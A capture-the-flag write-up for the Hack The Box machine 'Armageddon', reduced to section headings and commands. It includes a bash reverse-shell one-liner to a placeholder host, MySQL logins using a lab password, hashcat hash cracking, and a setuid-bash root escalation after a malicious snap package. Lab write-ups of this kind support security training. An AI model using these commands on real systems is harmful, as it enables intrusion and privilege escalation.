Hack The Box — Armageddon Write-up

Armageddon.image
Armageddon — Easy — Linux

Lets start pwning it ❗️

Reconnaissance

nmap -sC -sV 10.10.10.233 -o nmap.txt

Enumeration

bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'

Privilege Escalation

mysql -u drupaluser --password=CQHEy@9M*m23gBVj -e 'show databases'
mysql -u drupaluser --password=CQHEy@9M*m23gBVj -D drupal -e 'show tables'

Knowing the type and cracking hash

hashcat --example-hash | less
hashcat -m 7900 hashes -w /usr/share/wordlists/rockyou.txt

Exceeding Privilege Escalation

sudo -l

Creating simple .snap package

Creating a malicious .snap package

chown root:root /home/brucetherealadmin/bash;chmod 7455 /home/brucetherealadmin/bash
bash -p

Lesson Learned

Unlisted

--

--

--

Twitter: https://twitter.com/ShehryaarKhan4

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Pentesting Fundamentals — Try Hack Me Write up

BECOME A CRYPTO AND DEFI MASTER BY JOINING OUR FREE WEBINAR!

Password attack with Hydra on DVWA

Walkthrough to reset Crypto.com Login password- A beginners guide

Secure your Cloud Server from Hackers with Fail2Ban

Hardware Wallet: High Level Of Security

{UPDATE} Piano Kids - Learn Hack Free Resources Generator

Implementing Zero Trust In U.S. Government Information Systems: The Role of Data Access Governance

Get the Medium app